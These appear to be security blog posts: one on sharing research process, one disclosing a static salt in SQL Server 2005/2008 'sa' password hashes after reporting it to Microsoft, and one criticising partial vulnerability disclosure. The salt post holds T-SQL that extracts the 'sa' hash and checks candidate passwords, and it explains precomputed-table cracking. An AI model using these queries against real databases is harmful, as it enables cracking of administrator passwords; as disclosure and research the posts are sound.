On Security Research

I’ve been pondering URL rewriting for the past couple of days, trying to come up with a way a client of a web site can, first, determine whether URL rewriting is occurring on a given web server, and second, in cases where it is used, determine what the rewrite rules are.
As I have been thinking about this, it occurred to me that, despite the proliferation of security research whitepapers and blog posts, there is a scarcity of ‘this is the process I went through to do this research’ information out there.

There are mountains of articles and documents, with dizzying arrays of statistics and metrics (often intermingled with a fair amount of marketing fluff), and yet most of the whitepapers, and certainly the various conference presentations, simply don’t talk about the process – preferring instead to present the end results.
As security professionals, we gather at a multitude of conferences where we do a wonderful job of displaying all of this shiny data and showing off marvelous new tricks to each other, with varying degrees of self-indulgence. Yet most of how we came to have such cool stuff is left out of the picture entirely.

I understand why that is, of course. Simply put, the process is boring! It’s full of failure, and of repeatedly throwing things at a wall and observing what happens. Nobody wants to sit in a small room with a couple hundred hackers listening to someone drone on for an hour about how “this didn’t work… and neither did this.” I get that. Added to that is the fact that, in some cases, the research is being done for a corporate (or government) entity. In such a situation, the process may be withheld not from any lack of desire to share on the researcher’s part, but because the organization for which the work was done does not permit it.

Despite these reasons, in my opinion it is a disservice to ourselves, to the profession, and to others who may be interested in performing their own research, when all we do is deliver an end product as a glossy PDF or a shiny PowerPoint presentation. That simply isn’t research; it’s promotion. Research, in the academic sense, implies documenting the entire process: both success and failure. That is not what I find when I look at typical infosec industry output.

Accordingly, I’ve decided that I will share how I go about this particular project, and not just release some PDF or tool at the end of it. I’ll post my process here, along with any notes and thoughts, as well as any code I come up with. (Well, links to code anyway; I’ll probably keep the code itself on GitHub.)

One of the reasons I’m doing this is that I expect to fail. =)

As I’ve considered how one can detect URL rewriting, and as I’ve started investigating the details of how it works, my initial thought is that detecting it simply won’t be possible.

If that’s correct, I think it’s important that I present what I tried, along with the fact that ultimately it didn’t work. That’s vital information, in that it prevents someone else from wasting cycles repeating a process that’s already been done.

As well, understanding why something failed may lead to discovering a way to succeed.

OK… now that this rant is done, my next post will start the process of documenting my research into detecting URL rewriting.

SQL Server 2005 (and 2008) Static Salt

While performing a database security review for a client, I noticed that the password hashes for the ‘sa’ user in the master.sys.sql_logins table all had the same salt. This was true on four separate SQL Server instances across four different hosts.

Naturally, this piqued my curiosity, so I proceeded to investigate on as many SQL Server 2005 instances as I could get my hands on, and found that the salt was the same across the board.

To expound a bit:
If you run the following SQL statement:

SELECT password_hash FROM master.sys.sql_logins WHERE name = 'sa'

the whole password hash looks something like this:

0x01004086CEB6A06CF5E90B58D455C6795DFCE73A9C9570B31F21

The way that value breaks down is like so:

0x         : this is a hex value (the column is of type varbinary)
0100       : "throw away" constant bytes
4086CEB6   : the hash salt

The remainder of the value is the hashed password itself.

Since we’re only interested in bytes 3 – 6, we can use the SQL SUBSTRING() function to pull the part we care about like so:

  SELECT SUBSTRING(password_hash,3,4) AS sa_hash_bytes
  FROM master.sys.sql_logins WHERE name = 'sa';
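
If it helps to see the whole layout at once, the same approach can pull all three pieces apart in a single query (the column aliases are just labels I’ve picked, and the 20-byte length of the last piece simply matches the size of a SHA1 digest):

  SELECT SUBSTRING(password_hash,1,2)  AS header_bytes,    -- the constant 0x0100
         SUBSTRING(password_hash,3,4)  AS salt_bytes,      -- the 4-byte salt
         SUBSTRING(password_hash,7,20) AS hashed_password  -- remaining 20 (SHA1-sized) bytes
  FROM master.sys.sql_logins WHERE name = 'sa';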

On each SQL Server instance I tested, the salt was the same (0x4086CEB6).

This held true across service packs, and across differing versions of both the DBMS platform and the OS.

Here’s the output from ‘SELECT @@version’ on my test instances (minus the date and copyright):

Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86)
 Express Edition on Windows NT 6.0 (Build 6001: Service Pack 1)

Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86)
 Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)

Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
 Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
 Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

I did some checking to see if this was a known issue, and was unable to find an article or post describing it, or anyone in the industry who had heard of it.

While this isn’t a “sexy” BoF or anything, it does leave SQL Server administrative passwords open to password cracking (e.g., by using a precomputed table of SHA1 hashes built with the static, known salt, one can dramatically decrease the time it takes to crack an sa user password… on any SQL Server 2005 or 2008 instance). Additionally, once a password has been acquired, it may be possible to reuse that same password in other locations on a network if the administrators use a common password (or a common OS image for servers…).
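
To make the cracking angle concrete, here’s a minimal sketch of a candidate-password check, assuming the generally understood SQL Server 2005 construction of 0x0100 + salt + SHA1(UTF-16 password + salt); the candidate value below is just a placeholder. Because the salt never changes, the SHA1 work for any given candidate only ever needs to be done once, and the result can be reused against every ‘sa’ hash you come across:

  -- assumed hash layout: 0x0100 + 4-byte salt + SHA1( UTF-16LE(password) + salt )
  DECLARE @salt varbinary(4);
  DECLARE @candidate nvarchar(128);
  SET @salt = 0x4086CEB6;         -- the static salt observed above
  SET @candidate = N'Password1';  -- placeholder guess

  SELECT name AS cracked_login
  FROM master.sys.sql_logins
  WHERE name = 'sa'
    AND password_hash = 0x0100 + @salt
        + HASHBYTES('SHA1', CAST(@candidate AS varbinary(256)) + @salt);

In practice an attacker would run this sort of check offline against a dumped hash (or a precomputed table), of course; the T-SQL form above is just the easiest way to show why the fixed salt matters.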

The real risk this poses is fairly minor, since by default in the affected SQL Server versions normal users lack access to the column containing the password hash. However, there are a great many applications out there that use privileged accounts to access their database back end, and an even greater number of applications that contain SQL injection vulnerabilities. In my mind, there’s likely to be a fair amount of overlap between those two vectors, which would leave a system potentially exposed to exploitation through this method.

Accordingly, I decided to contact Microsoft. (I’ll leave the discussion about full disclosure for some other post.) I have to say, working with the MSRC was a pretty decent experience; they were quite competent and very forthcoming. Whatever else can be said about Microsoft, it’s clear that they have come a long way in dealing with vulnerabilities, which I am very happy to report.

The end result of all this is a Microsoft KB Article that explains more about the issue, along with some workarounds. According to that article, this will be fixed in SQL Server service packs at some point.

For those who are curious, the entire process took less than three months (I first reported the issue to Microsoft on December 11, 2009). In my opinion, that’s an acceptable time frame for a large company to address what is admittedly a minor security issue, particularly given the number of major (and minor) holidays that fall within that span.

About Disclosure

Let me start off by saying that I wish I had time to sit down and write this in a concise, coherent manner. Unfortunately, I don’t, so instead of a well-written post, here’s a rapid brain dump.

A couple of researchers (Robert E. Lee and Jack C. Louis) have recently been getting a very large amount of press for discovering a new vulnerability in TCP (see this blog post for a starting point).

The researchers are fairly well respected (among other things, they authored unicornscan, a tool I am quite fond of).

Like Dan Kaminsky with the DNS fiasco not too long ago, they have decided to go with what a colleague of mine accurately referred to as “dribble disclosure”: they’ve said there’s a problem, and they’ve given a large number of interviews handing out bits and pieces of what it may be, how they found it, and so on, but they have not come all the way out and said precisely what the issue is.

However, unlike Dan Kaminsky, they’ve done this *before* any patching of any kind has been released. It was bad enough trying to deal with this type of disclosure *after* vendors had already had a chance to patch; trying to do it without that benefit is insane.

The problem with this type of disclosure is that it leads to a gigantic circus of FUD, both in the media and elsewhere. For example, there’s some debate in various technical circles as to whether they have actually discovered anything new, or merely rediscovered older, known issues.

I’m giving them the benefit of the doubt and presuming that they have in fact found something new, but without information, who knows? It’s all guesswork.

As for the media, I wish it were only the uninformed “mass” media spreading unrest and FUD; unfortunately, even security researchers are contributing to the festivities.

For example, Robert Hansen (or RSnake as he is known) makes the following statement in his take:

I feel winter slowly coming, and it would be a shame if entire power grids could be taken offline with a few keystrokes, or if supply chains could be interrupted. I hear it gets awfully cold in Scandinavia.

Are you kidding me? We’ve gone from no details at all to entire power grids suddenly being knocked offline. Never mind the fact that it’s extremely unlikely (read: not gonna happen) that a device which controls an area’s power grid is directly connected to the internet. Devices that display power consumption/usage, maybe, but not devices that control where that power is going and whether or not a given path is online.

Fyodor (of nmap fame) has posted his guess at the details of this new vulnerability (along with an echo of my frustration at this type of disclosure); however, Robert E. Lee replies that while Fyodor makes very valid points and explains a bit of how their tool works, his guess doesn’t quite describe the attack they’ve found.

That’s one of the points of this rant: smart people *are* going to figure out what the problem is. They may be “good guys”, or they may be “bad guys” (in my opinion, both sides are likely to figure it out). Either way, there are certainly enough clues in the various reports and podcasts to enable someone who is clueful about the protocol to work out a likely scenario.

To make matters worse, this time there are at least five distinct vulnerabilities that Robert and Jack have documented. That, of course, increases the odds that an exploit will be found (that is, that someone will figure out at least one of the five, if not all of them).

So what really is the point of disclosing this way?
It isn’t helping anyone except the media and the researchers (because they get to revel in the media circus while it lasts).

More specifically:

    • It doesn’t protect end users.

    • It doesn’t help administrators.

    • It doesn’t even help security researchers other than those doing the dribbling, because rather than letting them look for ways to fix the problem, or for new ways to apply it to other areas, it forces them to recreate what’s already been done from a disjointed trail of clues.

So, why do it this way?
Disclosure is simple, really: either do it, or don’t.

Personally, I think “full disclosure” (i.e., ‘do it’) is best.
Whether you do so before or after “responsible” vendor notification, I don’t really care. But get all the information out there when you do it, or keep your mouth shut until you’re ready to.

I’m disgusted with this “new way” of doing things, and I’ve decided to coin a term for this method: discloscharades

Just like the game of charades, this “half-informed” nonsense ends up making the person dribbling out clues look silly (or worse), and it leaves the people doing the guesswork frustrated and annoyed.